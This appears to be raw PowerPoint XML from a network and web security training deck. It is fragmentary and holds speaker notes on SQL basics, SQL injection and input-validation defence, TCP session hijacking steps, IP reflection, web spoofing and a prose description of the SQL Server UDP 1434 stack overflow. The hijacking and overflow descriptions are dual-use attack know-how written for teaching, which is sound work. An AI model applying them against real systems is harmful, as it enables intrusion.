              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or date delimiter in MS Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/*…*/ Begin and End multiline comment delimiter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>36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Input validation is the most important part of defending against SQL injection. You should enforce input validation in all new applications through strong design. Any you should audit all your existing code and websites. You should additionally always harden your servers as well.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>38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a-IR" smtClean="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1E1DA11-8690-4337-93C6-0D34EDD92939}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>39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sz="1200" dirty="0" smtClean="0"/>
              <a:t>Decoy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" altLang="zh-CN" sz="1200" dirty="0" smtClean="0"/>
              <a:t> هدف مصنوعي</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5174D055-005C-4E50-8D6D-C3501DDB074E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>49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a-IR" smtClean="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1E1DA11-8690-4337-93C6-0D34EDD92939}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>55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174D055-005C-4E50-8D6D-C3501DDB074E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>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a-IR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56324" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E5E8A5AA-EBD9-4C22-A078-689AE544E389}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56325" name="Header Placeholder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endParaRPr lang="fa-I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a-IR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57348" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{608431AC-E995-47B9-842C-0BA2998D19E6}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57349" name="Header Placeholder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endParaRPr lang="fa-I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D2004B1C-B088-4D1A-A8AB-D5FAA1E1A540}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The threat of this type of spoofing is session hijacking and an attacker could bypass any authentication measures taken place to build the connection. This is accomplished by corrupting the DataStream of an established connection, then re-establishing it based on correct sequence and acknowledgement numbers with the attack machine.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C96CA4E4-DA93-4115-BD5F-FB466EB8122D}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>62</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>session hijack or reset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>TCP SESSION HIJACKING</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Send RST packet with spoofed source IP address and appropriate sequence number to one end</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SYN-flood that end send ACK packets to target at other end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7227CB9F-726C-4538-B823-8CF8139AF743}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Today, most OSs implement random sequence number generation, making it difficult to predict them accurately. If, however, the sequence number was compromised, data could be sent to the target.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5A45D662-1354-429F-9F96-C3C0D0249BA8}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>hide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5F383053-A909-4DA0-B8EE-AA63D8702312}" type="slidenum">
              <a:rPr lang="ar-SA" smtClean="0"/>
              <a:pPr/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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r>
              <a:rPr lang="en-US" altLang="ja-JP" smtClean="0"/>
              <a:t>ip reflected attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="MS PGothic"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811F323B-EFDF-42F6-B0DD-27970FBF7117}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"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B41A88C7-313A-4F47-8D1B-8F906877E54C}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="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mail transfer agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>MTA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>mail relay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is software that transfers electronic mail messages from one computer to another using a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId4" tooltip="Client–server"/>
              </a:rPr>
              <a:t>client–server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> application architecture.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{5174D055-005C-4E50-8D6D-C3501DDB074E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>71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31"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9ED60F03-B1C7-404F-9397-A91304321759}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>22</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r>
              <a:rPr lang="en-US" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>When SQL Server receives a packet on UDP port 1434 with the first byte set to 0x04, the SQL Monitor thread takes the remaining data in the packet and attempts to open a registry key using this user supplied information. For example, by sending \x04\x41\x41\x41\x41 (0x04 followed by 4 upper case 'A's) SQL Server attempts to open HKLM\Software\Microsoft\Microsoft SQL Server\AAAA\MSSQLServer\CurrentVersion By appending a large number of bytes to the end of this packet, whilst preparing the string for the registry key to open, a stack based buffer is overflowed and the saved return address is overwritten. This allows an attacker to gain complete control of the SQL Server process and its path of execution. By overwriting the saved return address on the stack with an address that contains a "jmp esp" or "call esp" instruction, when the vulnerable procedure returns the processor will start executing code of the attacker's choice. At no stage does the attacker need to authenticate. </a:t>
            </a:r>
          </a:p>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174D055-005C-4E50-8D6D-C3501DDB074E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>75</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ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FB3ED7FF-E630-4993-B834-77548366996E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>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fa-IR"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ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FDBE314D-6C76-42A4-8B8E-1E2E96A87719}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>79</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>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fa-IR"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62467" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" numCol="1" anchor="ctr" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fa-IR"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ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{3B02DEE1-73E0-46D2-B2B8-DA7D477B6B70}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>93</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" smtClean="0"/>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The text and pictures on a Web page might give some impression about where the page came from – corporate logo implies it came from a certain corporation.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a-IR" smtClean="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1E1DA11-8690-4337-93C6-0D34EDD92939}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>24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SQL stands for Structured Query Language. It is the and ANSI (American National Standards Institute) standard language for accessing and manipulating relational database systems. ANSI is a standards committee composed of database experts from industry, academia and software vendors. It has also been accepted as a standard by ISO (International Organization for Standardization). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL is a standard open language without corporate ownership. The commercial acceptance of SQL was precipitated by the formation of SQL Standards committees by the ANSI and the ISO in 1986 and 1987. Two years later they published a specification known as SQL89. An improvement and expansion to the standard gave the world SQL92. We now have the third generation standard, SQL99 also known as SQL3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL is used to communicate with a database. The communicating parties are typically a "front end" which sends a SQL Statement across a connection to a "back end" that holds the data. SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>statements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> are used to perform tasks such as retrieve, create, update or delete data from a database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some common relational database management systems that use SQL are: Oracle, MS SQL Server, MS Access, Ingres, DB2, Sybase, Informix, etc.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>25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Although most database systems use SQL, most of them also have their own additional proprietary extensions that are usually only used on their system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most DBMS are designed to meet the SQL92 standard partially and have not implemented the advanced features. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However, the standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used throughout all database with little changes. All of the core functions, such as adding, reading and modifying data, are the same. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>26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relational database system contains one or more objects called tables. The data or information for the database are stored in these tables. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Tables are uniquely identified by their names and are comprised of columns and rows. Columns contain the column name, data type, and any other attributes for the column. Rows contain the records or data for the columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here is a sample table called "users". This is a user defined table that could be used for validating and managing application users.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In this table, the first row called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is specified as an integer. By being defined as an integer column the only type of data that can be stored in that column are numeric integers. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is also the Primary Key for the Table. A table usually has a column or combination of columns whose values uniquely identify each row in the table. This column (or columns) is called the Primary Key of the table and enforces the entity integrity of the table. There can be no duplicate values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The other four columns are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>varchar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> (variable character data). Any kind of strings can be stored in these columns. Character data consists of any combination of letters, symbols, and numeric characters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To note, the password field is not encrypted. This should be implemented at an application level. These passwords are not directly linked or related to the SQL database passwords or the Operating System passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>27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SELECT statement is used to query the database and retrieve selected data that match the criteria that you specify. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The column </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>LastName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that follows the SELECT keyword determines which column will be returned in the results. You can select as many column names that you'd like, or you can use a "*" to select all columns.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The table name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> that follows the keyword FROM specifies the table that will be queried to retrieve the desired results.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The WHERE clause (optional) specifies which data values or rows will be returned or displayed. Based on the criteria described after the keyword WHERE the select statement will only bring the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>LastName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> value for all rows where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> = 1. And also because </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>UserID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is the Primary Key (and therefore cannot have duplicate values), the only result for this query is "Smith".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>28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SQL injection is a type of security exploit in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It's a serious vulnerability, which can lead to a high level of compromise - usually the ability to run any database query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is an attack on web-based applications that connect to database back-ends in which the attacker executes unauthorized (and unexpected) SQL commands by taking advantage of insecure code and bad input validation. It is very often done on systems connected to the Internet because it allows to completely bypass the firewall. SQL injection attacks can be used to steal information from a database from which the data would normally not be available and to gain access to host computers through the database engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{21365F6B-30BF-4BA8-B3E3-089A7E875290}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>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0">
              <a:srgbClr val="FFCC66"/>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685800" y="3124200"/>
            <a:ext cx="7772400" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="r" rtl="1">
              <a:defRPr sz="3200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="3657600"/>
            <a:ext cx="6400800" cy="533400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r" rtl="1">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="1800" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master subtitle style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6245225"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" baseline="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6245225"/>
            <a:ext cx="2895600" cy="476250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="1400" baseline="0" smtClean="0">
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>UNCLASSIFIED</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553200" y="6245225"/>
            <a:ext cx="2133600" cy="476250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
